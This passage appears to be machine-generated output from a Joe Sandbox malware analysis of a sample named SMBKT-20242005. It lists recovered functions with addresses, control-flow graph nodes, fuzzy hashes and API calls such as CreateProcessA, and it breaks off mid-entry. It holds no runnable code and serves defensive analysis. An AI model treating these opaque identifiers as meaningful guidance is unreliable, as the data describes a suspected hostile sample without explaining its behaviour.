                          • API ID:
                          • String ID: />X$/>X$P,0e
                          • API String ID: 0-1511438267
                          • Opcode ID: e548e951d3fc577fdb6c3c84be262e7099ad0cf3281520b195d54d5b86704617
                          • Instruction ID: 57ec5fbbaa67c19b6a80a6126c44149056db8d2eb55c1afbd9c062b5a10428a0
                          • Opcode Fuzzy Hash: e548e951d3fc577fdb6c3c84be262e7099ad0cf3281520b195d54d5b86704617
                          • Instruction Fuzzy Hash: 03C17871D0021ADFCF18CFA5D4818AEFBB6FF88351B11A529D445AB218DB74EA42CF94
                          Function 04DE315D Relevance: 4.0, Strings: 3, Instructions: 215COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 518 4de315d-4de316a 522 4de316c 518->522 523 4de31cd 518->523 524 4de3173-4de318f 522->524 527 4de31e8 523->527 525 4de3198-4de3199 524->525 526 4de3191 524->526 525->523 526->522 526->523 526->525 526->527 528 4de339e-4de340f 526->528 529 4de323f-4de3242 526->529 530 4de352f-4de3537 526->530 531 4de319b-4de31b6 526->531 532 4de31b8-4de31cb 526->532 533 4de32c6-4de336f 526->533 534 4de32a5 526->534 535 4de3223 526->535 536 4de31ef-4de320b 527->536 575 4de3415 call 4de6c48 528->575 576 4de3415 call 4de6c38 528->576 581 4de3245 call 4de7a6f 529->581 582 4de3245 call 4de7a3c 529->582 583 4de3245 call 4de7a34 529->583 584 4de3245 call 4de7a80 529->584 531->524 532->524 577 4de3372 call 4de4318 533->577 578 4de3372 call 4de4309 533->578 585 4de32a8 call 4dea8f8 534->585 586 4de32a8 call 4dea908 534->586 587 4de3225 call 4df6ecf 535->587 588 4de3225 call 4df6ee0 535->588 537 4de321d-4de321e 536->537 538 4de320d 536->538 537->530 538->527 538->528 538->529 538->530 538->533 538->534 538->535 538->537 539 4de324b-4de3262 579 4de3267 call 4de92d0 539->579 580 4de3267 call 4de92c0 539->580 541 4de32ae-4de32c1 541->536 544 4de322b-4de323d 544->536 545 4de326d-4de3273 549 4de327f-4de32a0 545->549 549->536 554 4de341b-4de3428 555 4de342a-4de3436 554->555 556 4de3452 554->556 558 4de3438-4de343e 555->558 559 4de3440-4de3446 555->559 560 4de3458-4de34e5 556->560 561 4de3450 558->561 559->561 569 4de350f 560->569 570 4de34e7-4de34f3 560->570 561->560 564 4de3378-4de3399 564->536 573 4de3515-4de352a 569->573 571 4de34fd-4de3503 570->571 572 4de34f5-4de34fb 570->572 574 4de350d 571->574 572->574 573->536 574->573 575->554 576->554 577->564 578->564 579->545 580->545 581->539 582->539 583->539 584->539 585->541 586->541 587->544 588->544
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: /V-+$^f6$Zku
                          • API String ID: 0-867436096
                          • Opcode ID: 2b0753d1b3b5573bf885db6f90fb005ce7a4a0ff26ef028f8435f3c68011ad05
                          • Instruction ID: f123b835a453b8b93e90c6d51b3ded1c8b2c70aa2aaf025c9124c718cfbdff54
                          • Opcode Fuzzy Hash: 2b0753d1b3b5573bf885db6f90fb005ce7a4a0ff26ef028f8435f3c68011ad05
                          • Instruction Fuzzy Hash: AAA1F574E00259CFDB64DFA5D954BADBBB2BF88300F1085AAD809AB354DB319E81CF54
                          Function 04DE3148 Relevance: 4.0, Strings: 3, Instructions: 211COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 589 4de3148-4de316a 591 4de316c 589->591 592 4de31cd 589->592 593 4de3173-4de318f 591->593 596 4de31e8 592->596 594 4de3198-4de3199 593->594 595 4de3191 593->595 594->592 595->591 595->592 595->594 595->596 597 4de339e-4de340f 595->597 598 4de323f-4de3242 595->598 599 4de352f-4de3537 595->599 600 4de319b-4de31b6 595->600 601 4de31b8-4de31cb 595->601 602 4de32c6-4de336f 595->602 603 4de32a5 595->603 604 4de3223 595->604 605 4de31ef-4de320b 596->605 652 4de3415 call 4de6c48 597->652 653 4de3415 call 4de6c38 597->653 648 4de3245 call 4de7a6f 598->648 649 4de3245 call 4de7a3c 598->649 650 4de3245 call 4de7a34 598->650 651 4de3245 call 4de7a80 598->651 600->593 601->593 654 4de3372 call 4de4318 602->654 655 4de3372 call 4de4309 602->655 656 4de32a8 call 4dea8f8 603->656 657 4de32a8 call 4dea908 603->657 644 4de3225 call 4df6ecf 604->644 645 4de3225 call 4df6ee0 604->645 606 4de321d-4de321e 605->606 607 4de320d 605->607 606->599 607->596 607->597 607->598 607->599 607->602 607->603 607->604 607->606 608 4de324b-4de3262 646 4de3267 call 4de92d0 608->646 647 4de3267 call 4de92c0 608->647 610 4de32ae-4de32c1 610->605 613 4de322b-4de323d 613->605 614 4de326d-4de3273 618 4de327f-4de32a0 614->618 618->605 623 4de341b-4de3428 624 4de342a-4de3436 623->624 625 4de3452 623->625 627 4de3438-4de343e 624->627 628 4de3440-4de3446 624->628 629 4de3458-4de34e5 625->629 630 4de3450 627->630 628->630 638 4de350f 629->638 639 4de34e7-4de34f3 629->639 630->629 633 4de3378-4de3399 633->605 642 4de3515-4de352a 638->642 640 4de34fd-4de3503 639->640 641 4de34f5-4de34fb 639->641 643 4de350d 640->643 641->643 642->605 643->642 644->613 645->613 646->614 647->614 648->608 649->608 650->608 651->608 652->623 653->623 654->633 655->633 656->610 657->610
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: /V-+$^f6$Zku
                          • API String ID: 0-867436096
                          • Opcode ID: e5d849a5bfe25afa6c515851443488520409b9e85f651882c95dadf6d1dba2be
                          • Instruction ID: 890398c8a72de64d6cca73a6c55631aa1f227294bbaf3649d099d52d337ffd61
                          • Opcode Fuzzy Hash: e5d849a5bfe25afa6c515851443488520409b9e85f651882c95dadf6d1dba2be
                          • Instruction Fuzzy Hash: ADA1F674E00259CFDB64DFA5D954BADBBB2BF88300F1085AAD809AB354DB319E81CF50
                          Function 04DE31D0 Relevance: 3.9, Strings: 3, Instructions: 181COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 658 4de31d0-4de31e5 660 4de31e8 658->660 661 4de31ef-4de320b 660->661 662 4de321d-4de321e 661->662 663 4de320d 661->663 666 4de352f-4de3537 662->666 663->660 663->662 664 4de339e-4de340f 663->664 665 4de323f-4de3242 663->665 663->666 667 4de32c6-4de336f 663->667 668 4de32a5 663->668 669 4de3223 663->669 707 4de3415 call 4de6c48 664->707 708 4de3415 call 4de6c38 664->708 711 4de3245 call 4de7a6f 665->711 712 4de3245 call 4de7a3c 665->712 713 4de3245 call 4de7a34 665->713 714 4de3245 call 4de7a80 665->714 709 4de3372 call 4de4318 667->709 710 4de3372 call 4de4309 667->710 715 4de32a8 call 4dea8f8 668->715 716 4de32a8 call 4dea908 668->716 717 4de3225 call 4df6ecf 669->717 718 4de3225 call 4df6ee0 669->718 670 4de324b-4de3262 705 4de3267 call 4de92d0 670->705 706 4de3267 call 4de92c0 670->706 671 4de32ae-4de32c1 671->661 674 4de322b-4de323d 674->661 675 4de326d-4de3273 679 4de327f-4de32a0 675->679 679->661 684 4de341b-4de3428 685 4de342a-4de3436 684->685 686 4de3452 684->686 688 4de3438-4de343e 685->688 689 4de3440-4de3446 685->689 690 4de3458-4de34e5 686->690 691 4de3450 688->691 689->691 699 4de350f 690->699 700 4de34e7-4de34f3 690->700 691->690 694 4de3378-4de3399 694->661 703 4de3515-4de352a 699->703 701 4de34fd-4de3503 700->701 702 4de34f5-4de34fb 700->702 704 4de350d 701->704 702->704 703->661 704->703 705->675 706->675 707->684 708->684 709->694 710->694 711->670 712->670 713->670 714->670 715->671 716->671 717->674 718->674
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: /V-+$^f6$Zku
                          • API String ID: 0-867436096
                          • Opcode ID: 61ec23b408830e8d429c9b8931ddc44aa2cc5334bb9b67c577b150a724da9885
                          • Instruction ID: d26453108820ee791c6da8fdb8d58dd5f8a043db18a7e48f56a5be58d4d6afdb
                          • Opcode Fuzzy Hash: 61ec23b408830e8d429c9b8931ddc44aa2cc5334bb9b67c577b150a724da9885
                          • Instruction Fuzzy Hash: 8F91D574E10229CFDB64DFA5D955BADBBB2BF88300F1081AAD809A7344DB319E81CF50
                          Function 08E9DEB0 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: p
                          • API String ID: 0-2181537457
                          • Opcode ID: 886b12efdef19bd7278f7bf65562f69316cef0840792af4feb8522635c6be27b
                          • Instruction ID: 7cd9dcfa7f73d14f25aa1f216c8e1a4e2d7c73a78ca5ed367e734c6b9970d9d8
                          • Opcode Fuzzy Hash: 886b12efdef19bd7278f7bf65562f69316cef0840792af4feb8522635c6be27b
                          • Instruction Fuzzy Hash: 81510671E01318CFEB68CF6AD940B8AFBB3BF89201F04D5A9D448AB215D7709A85CF55
                          Function 04DF80D9 Relevance: .4, Instructions: 404COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6eba5e1cdd1729d871a0632619a8a067897cbc89d807c304c25ec1358cca9db2
                          • Instruction ID: 28123447a25b89eed53a54cb5d1e57de76d665ee53d298d05233a67b9de14c58
                          • Opcode Fuzzy Hash: 6eba5e1cdd1729d871a0632619a8a067897cbc89d807c304c25ec1358cca9db2
                          • Instruction Fuzzy Hash: 20E1AC707016048FEB39EBA9C850BAEB7F6BF89305F154469E246DB290CB35E901DB61
                          Function 08E92558 Relevance: .4, Instructions: 382COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a8831a4f67e52087b8ec4cc7c26f3195e1d416ffccd45995fdcd76f5d0bc9231
                          • Instruction ID: 3d0f23f757f0b064b19e21cde0743ffaf57be3534604b25f608053275f04c304
                          • Opcode Fuzzy Hash: a8831a4f67e52087b8ec4cc7c26f3195e1d416ffccd45995fdcd76f5d0bc9231
                          • Instruction Fuzzy Hash: 9C12C775D1071ACFCB25DF68C880AD9F7B1BF49300F1196AAD958A7211EB70AAC5CF90
                          Function 08E92552 Relevance: .4, Instructions: 374COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d2db6544e65cfbb32de96d15a0cefcc844551957b9639923480adccc7f10f619
                          • Instruction ID: 27aafeb31841c3fdeddc0947942ab07232f48667dfa4c0957f2b557640772754
                          • Opcode Fuzzy Hash: d2db6544e65cfbb32de96d15a0cefcc844551957b9639923480adccc7f10f619
                          • Instruction Fuzzy Hash: 0412C775D0071ACFCB25DF68C880AD9F7B1BF49300F1586AAD958A7211EB70AAC5CF90
                          Function 04DE92D0 Relevance: .2, Instructions: 218COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 30cc0fc6acb2e21b7497d947480c37051c437f8edb3ca5e269b4182e8b333d4e
                          • Instruction ID: 64720cc019e60715d9a24402e48a9ef05d4a502ffb3c9ff46ae203172493acf0
                          • Opcode Fuzzy Hash: 30cc0fc6acb2e21b7497d947480c37051c437f8edb3ca5e269b4182e8b333d4e
                          • Instruction Fuzzy Hash: E1911AB0E05219EFCF14CFA6D8945AEFBB2FF89310F10952AD405BB264E7349942DB14
                          Function 04DE92C0 Relevance: .2, Instructions: 216COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0e0cde169267e8b2ee52784557054cfcbc47cc79ca2e834dccf76a3712ab81b6
                          • Instruction ID: df78f6f89ee87dc720a24e6d9860a6fb9964e81a31fc2e9198346146f7971f3e
                          • Opcode Fuzzy Hash: 0e0cde169267e8b2ee52784557054cfcbc47cc79ca2e834dccf76a3712ab81b6
                          • Instruction Fuzzy Hash: 2D9118B1E05219DFCF08CFA6D8905AEFBB2FF89310F10956AD405EB264E7349942DB14
                          Function 08E997A0 Relevance: .2, Instructions: 186COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3eafcc69be3b9d0db706ee514655c4e7c96ca90208b95857edb2b7ffc613447d
                          • Instruction ID: f1bf4db856e4807cd93645469d0a918200e9d6d8351f889be22744ab1740f160
                          • Opcode Fuzzy Hash: 3eafcc69be3b9d0db706ee514655c4e7c96ca90208b95857edb2b7ffc613447d
                          • Instruction Fuzzy Hash: 9E81A0B5E002198FDB08DFAAC885ADEFBB2FF89310F14812AD815AB355D7745905CF54
                          Function 08E997B0 Relevance: .2, Instructions: 183COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 498d45f297e27df3af687116a0443e7eea9ea55c7bebcdc7643048ac587390e2
                          • Instruction ID: 80e3a701b3408cefebc9f5ad13b4b764ca902b9347dee8e5ffa4122be31de2e9
                          • Opcode Fuzzy Hash: 498d45f297e27df3af687116a0443e7eea9ea55c7bebcdc7643048ac587390e2
                          • Instruction Fuzzy Hash: 9981A075E002198FDB08DFEAC884ADEFBB2FF89301F10952AD815AB255DB745905CF54
                          Function 08E99FD8 Relevance: .1, Instructions: 134COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6666f3827f2937ec9264a51aea4f5d0631f6b33814b757d52a3f4958c5573ba
                          • Instruction ID: f9a00efa85ff0b00ee7191cb5b9eef743845ef7cc0d07c6ac881d8dff00abde8
                          • Opcode Fuzzy Hash: d6666f3827f2937ec9264a51aea4f5d0631f6b33814b757d52a3f4958c5573ba
                          • Instruction Fuzzy Hash: 545145B1E002298FDB08CFAAD8416EEFBF2FF89301F14D46AD459B7250D73499018B68
                          Function 08E99FE8 Relevance: .1, Instructions: 131COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3c372351f4a3d073e0b86d3a748455cbcf2f4da232ca7b16dc36a8ccbc4876f5
                          • Instruction ID: 74baa4c256186b81f0c643db81fe5d69339f028e8cb7b0066ae2b7544059a067
                          • Opcode Fuzzy Hash: 3c372351f4a3d073e0b86d3a748455cbcf2f4da232ca7b16dc36a8ccbc4876f5
                          • Instruction Fuzzy Hash: 5A5145B1E042299FDF08CFAAC9446EEFBF2BF89301F14D46AD459A7250D7745A018B68
                          Function 08E9A948 Relevance: .1, Instructions: 67COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 28c36df400ed4e8dc447729d00affb0a719881339e0edf6ce9ec6ee48dee6d80
                          • Instruction ID: 8c5e106fd01be08b4e298725eaa01cb6203ca7ae24fd3482d0a9dc62bf48f394
                          • Opcode Fuzzy Hash: 28c36df400ed4e8dc447729d00affb0a719881339e0edf6ce9ec6ee48dee6d80
                          • Instruction Fuzzy Hash: 6521F471E006188BEB18CFABD8447DEBBB7AFC8311F14C16AD809AA254DB7419558F90
                          Function 08E9A939 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a93de222f79e5999cd9d09644364600eb4626ea83838c6dcdaa41ff1cfe77715
                          • Instruction ID: b30bac9007881e21b61ca18793e21b33c05b58402ed911d782d166d1c955d786
                          • Opcode Fuzzy Hash: a93de222f79e5999cd9d09644364600eb4626ea83838c6dcdaa41ff1cfe77715
                          • Instruction Fuzzy Hash: 7A21E9B1E006588BEB18CFAAD9443DEBBF3AFC9310F14C16AD408AA254DB740A46CF50
                          Function 04DF6599 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a9105b82a975132d3d6feb06709599358b193e514ae1e21baea0584a9e44354a
                          • Instruction ID: 8067bf25bcf0682bd75ec5b7cf6eba3ada61d34f469e4d4c3eed35247ea247d8
                          • Opcode Fuzzy Hash: a9105b82a975132d3d6feb06709599358b193e514ae1e21baea0584a9e44354a
                          • Instruction Fuzzy Hash: 21A00250F9F2148090711C500C014B4C03C420B664D5336081F9E338022C04F042245C
                          Function 0137D410 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0137D49E
                          • GetCurrentThread.KERNEL32 ref: 0137D4DB
                          • GetCurrentProcess.KERNEL32 ref: 0137D518
                          • GetCurrentThreadId.KERNEL32 ref: 0137D571
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: b7922af3d332df97bbe492a904e85a5e00b098aafdf826d10a3fe64b866ce8ec
                          • Instruction ID: c6774d832c283dd9ac07bbb1643db630b5527d23582e5815cd91af3ae9137b56
                          • Opcode Fuzzy Hash: b7922af3d332df97bbe492a904e85a5e00b098aafdf826d10a3fe64b866ce8ec
                          • Instruction Fuzzy Hash: 755157B090074A8FDB24DFA9D548BEEBBF1FF88318F24845AE419A7360D7785944CB61
                          Function 0137D420 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0137D49E
                          • GetCurrentThread.KERNEL32 ref: 0137D4DB
                          • GetCurrentProcess.KERNEL32 ref: 0137D518
                          • GetCurrentThreadId.KERNEL32 ref: 0137D571
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 36af5ac48b9393009ebd1bc8c7356f123c41c8596e611c2c19ec5a60c4540571
                          • Instruction ID: 5e111ab9ac1687ebf0694a766ee417ffbf06476a2a62604baa79aa47a8b98027
                          • Opcode Fuzzy Hash: 36af5ac48b9393009ebd1bc8c7356f123c41c8596e611c2c19ec5a60c4540571
                          • Instruction Fuzzy Hash: 3D5148B09007498FDB24DFAAD548BDEBBF1FF88318F20845AE419A7360D7749944CB65
                          Function 08E9BE38 Relevance: 2.6, Strings: 2, Instructions: 71COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 789 8e9be38-8e9be66 790 8e9be68 789->790 791 8e9be6d-8e9be72 789->791 790->791 804 8e9be75 call 8e9bf51 791->804 805 8e9be75 call 8e9bf60 791->805 792 8e9be7b 793 8e9be82-8e9be9e 792->793 794 8e9bea0 793->794 795 8e9bea7-8e9bea8 793->795 794->792 794->795 796 8e9bead-8e9bec1 794->796 797 8e9bf2f-8e9bf33 794->797 798 8e9bef1-8e9bf0b 794->798 799 8e9bf10-8e9bf2a 794->799 795->797 801 8e9bec3-8e9bed2 796->801 802 8e9bed4-8e9bedb 796->802 798->793 799->793 803 8e9bee2-8e9beef 801->803 802->803 803->793 804->792 805->792
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8[W$8[W
                          • API String ID: 0-3882825709
                          • Opcode ID: a13c46994d7a08c58dad72dcb6cd0ac766b395955f8ed2dffe06fa8421fd360d
                          • Instruction ID: 950ef4a1103ed1a83d33c72561995061c0a28cc56a4d4a0ca969923e4e3b7907
                          • Opcode Fuzzy Hash: a13c46994d7a08c58dad72dcb6cd0ac766b395955f8ed2dffe06fa8421fd360d
                          • Instruction Fuzzy Hash: 82318C71E0825ADFCB04CFB9D5405AEFFF5EF8A310F1495AAD045AB251D7308A41CB51
                          Function 08E9BE48 Relevance: 2.6, Strings: 2, Instructions: 69COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 806 8e9be48-8e9be66 807 8e9be68 806->807 808 8e9be6d-8e9be72 806->808 807->808 821 8e9be75 call 8e9bf51 808->821 822 8e9be75 call 8e9bf60 808->822 809 8e9be7b 810 8e9be82-8e9be9e 809->810 811 8e9bea0 810->811 812 8e9bea7-8e9bea8 810->812 811->809 811->812 813 8e9bead-8e9bec1 811->813 814 8e9bf2f-8e9bf33 811->814 815 8e9bef1-8e9bf0b 811->815 816 8e9bf10-8e9bf2a 811->816 812->814 818 8e9bec3-8e9bed2 813->818 819 8e9bed4-8e9bedb 813->819 815->810 816->810 820 8e9bee2-8e9beef 818->820 819->820 820->810 821->809 822->809
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8[W$8[W
                          • API String ID: 0-3882825709
                          • Opcode ID: 1791fbacc3cb223bd8dc8a08202db42449b5c917e1a1bfdb8aaa6e05b739c1e0
                          • Instruction ID: 165ddbd9e5ab2ec581d940982bac1554e02eea34b94f78090ec61f2539e47f73
                          • Opcode Fuzzy Hash: 1791fbacc3cb223bd8dc8a08202db42449b5c917e1a1bfdb8aaa6e05b739c1e0
                          • Instruction Fuzzy Hash: 942137B1E09219EFCB04CFAAD9405AEFBF6BF89311F10E5AAD549A7210D7708B41CB51
                          Function 04DF2DA3 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 823 4df2da3-4df2e3d 826 4df2e3f-4df2e49 823->826 827 4df2e76-4df2e96 823->827 826->827 828 4df2e4b-4df2e4d 826->828 832 4df2ecf-4df2efe 827->832 833 4df2e98-4df2ea2 827->833 830 4df2e4f-4df2e59 828->830 831 4df2e70-4df2e73 828->831 834 4df2e5d-4df2e6c 830->834 835 4df2e5b 830->835 831->827 843 4df2f37-4df2ff1 CreateProcessA 832->843 844 4df2f00-4df2f0a 832->844 833->832 836 4df2ea4-4df2ea6 833->836 834->834 837 4df2e6e 834->837 835->834 838 4df2ec9-4df2ecc 836->838 839 4df2ea8-4df2eb2 836->839 837->831 838->832 841 4df2eb6-4df2ec5 839->841 842 4df2eb4 839->842 841->841 845 4df2ec7 841->845 842->841 855 4df2ffa-4df3080 843->855 856 4df2ff3-4df2ff9 843->856 844->843 846 4df2f0c-4df2f0e 844->846 845->838 848 4df2f31-4df2f34 846->848 849 4df2f10-4df2f1a 846->849 848->843 850 4df2f1e-4df2f2d 849->850 851 4df2f1c 849->851 850->850 852 4df2f2f 850->852 851->850 852->848 866 4df3082-4df3086 855->866 867 4df3090-4df3094 855->867 856->855 866->867 870 4df3088 866->870 868 4df3096-4df309a 867->868 869 4df30a4-4df30a8 867->869 868->869 871 4df309c 868->871 872 4df30aa-4df30ae 869->872 873 4df30b8-4df30bc 869->873 870->867 871->869 872->873 874 4df30b0 872->874 875 4df30ce-4df30d5 873->875 876 4df30be-4df30c4 873->876 874->873 877 4df30ec 875->877 878 4df30d7-4df30e6 875->878 876->875 879 4df30ed 877->879 878->877 879->879
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04DF2FDE
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 1b3ac627cc260fd50ba9622886b9b4dbeae5cf93ddc68142458c3e3a336ee3c6
                          • Instruction ID: dec70ea8fdcc845f53a7a2d78dbe3e0ac2612c126a815e911390e7bb45602a3c
                          • Opcode Fuzzy Hash: 1b3ac627cc260fd50ba9622886b9b4dbeae5cf93ddc68142458c3e3a336ee3c6
                          • Instruction Fuzzy Hash: D5918B71D00259DFEB20CFA9CC41BEDBBB2BF44314F1585AAE908A7240DB75A985CF91
                          Function 04DF2DA8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04DF2FDE
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 1e91ab7e8e060fafe7e88ae6b795d94a8afd4946d6309d21e46a5311487b53a6
                          • Instruction ID: e7b8120e26e43048060b7229233480c6918b1d321af215c4a244849a9a5e83f8
